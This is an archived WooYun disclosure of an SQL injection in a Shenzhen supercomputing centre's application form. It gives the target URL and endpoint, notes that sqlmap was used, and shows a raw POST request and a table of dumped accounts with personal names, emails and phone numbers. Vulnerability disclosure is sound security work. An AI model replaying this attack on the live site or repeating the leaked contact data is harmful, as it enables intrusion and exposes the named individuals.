当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116618

漏洞标题:国家超级计算某超算中心SQL注入影响全站数据

相关厂商:国家超级计算某超算中心

漏洞作者: Hydra_Tc

提交时间:2015-05-28 09:58

修复时间:2015-07-17 09:46

公开时间:2015-07-17 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

国家超级计算某超算中心SQL注入影响全站数据

详细说明:

深圳超算中心在线申请页面存在post注入
http://www.nsccsz.gov.cn/hpc/services/apply.aspx
sqlmap注入过程中需要隔几分钟重新抓包更改验证码

POST /ajaxnet/NsccszDA.ashx HTTP/1.1
Host: www.nsccsz.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
X-AjaxNet-Method: SaveHpcOrder
X-Requested-With: XMLHttpRequest
Referer: http://www.nsccsz.gov.cn/hpc/services/apply.aspx
Content-Length: 321
Cookie: Hm_lvt_c261b5a38f2455f39b785d78eb203e89=1432742529; Hm_lpvt_c261b5a38f2455f39b785d78eb203e89=1432742529; Hm_lvt_c76fc7c4b1c034f612c1ef00e01a7349=1432742529; Hm_lpvt_c76fc7c4b1c034f612c1ef00e01a7349=1432742983; _gscu_359056655=32742529izryvc55; _gscs_359056655=3274252937z2h055|pv:14; _gscbrs_359056655=1; ASP.NET_SessionId=D3985C1157DA745CDC55743C
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"order":{"Domain":"科学计算、分子模拟、量子计算与气候气象业务","Type":"机时租用","Division":"GK-科学计算分区","Method":"包月","Amount":1,"Cpu":1,"Disk":1,"Vpn":1,"Softwares":"1","Other":"1","Company":"1111","Contact":"111","Mobile":"13555555555","Email":"asd@qq.com"},"checkCode":"2625"}


aaa1.jpg


aaa2.jpg


泄露大量账号密码

+-----+-----------+--------------------+----------------------+-----------------------+---------+-------------+----------+------------------+
| id | parent_id | tel | name | email | remark | mobile | contacts | enterprise |
+-----+-----------+--------------------+----------------------+-----------------------+---------+-------------+----------+------------------+
| 1 | 0 | NULL | root | NULL | NULL | NULL | NULL | 根 |
| 56 | 0 | 86576053 | nsccsz | lipu@nsccsz.gov.cn | <blank> | 18927492705 | 李璞 | 超算中心 |
| 57 | 0 | 86576053 | szsti | lipu@nsccsz.gov.cn | <blank> | 18927492705 | 李璞 | 科技创新委 |
| 58 | 56 | 86576053 | nsccszpersonal | lipu@nsccsz.gov.cn | <blank> | 18927492705 | 李璞 | 超算中心个人用户 |
| 61 | 0 | <blank> | text | vteipdx@qq.com | NULL | <blank> | <blank> | 1 |
| 62 | 56 | <blank> | test | ds@dd.com | <blank> | <blank> | 李工 | test |
| 63 | 64 | <blank> | SoftWareparkPersonal | <blank> | <blank> | <blank> | 李工 | 深圳软件园云服务平台个人注册帐号 |

漏洞证明:

同上

修复方案:

过滤。

版权声明:转载请注明来源 Hydra_Tc@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-02 09:46

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:11
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-28 10:13 | xtnnd ( 普通白帽子 | Rank:180 漏洞数:43 )

    然而并没有什么软用

  2. 2015-05-28 13:00 | aygj1412 ( 路人 | 还没有发布任何漏洞 | 只有神知道的世界)

    超算又中招了?

  3. 2015-05-28 17:46 | Hydra_Tc ( 实习白帽子 | Rank:70 漏洞数:14 )

    @xtnnd 对啊对啊

  4. 2015-06-02 10:15 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    超算又中招了?

  5. 2015-07-17 19:58 | 屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)

    CCTV看这里!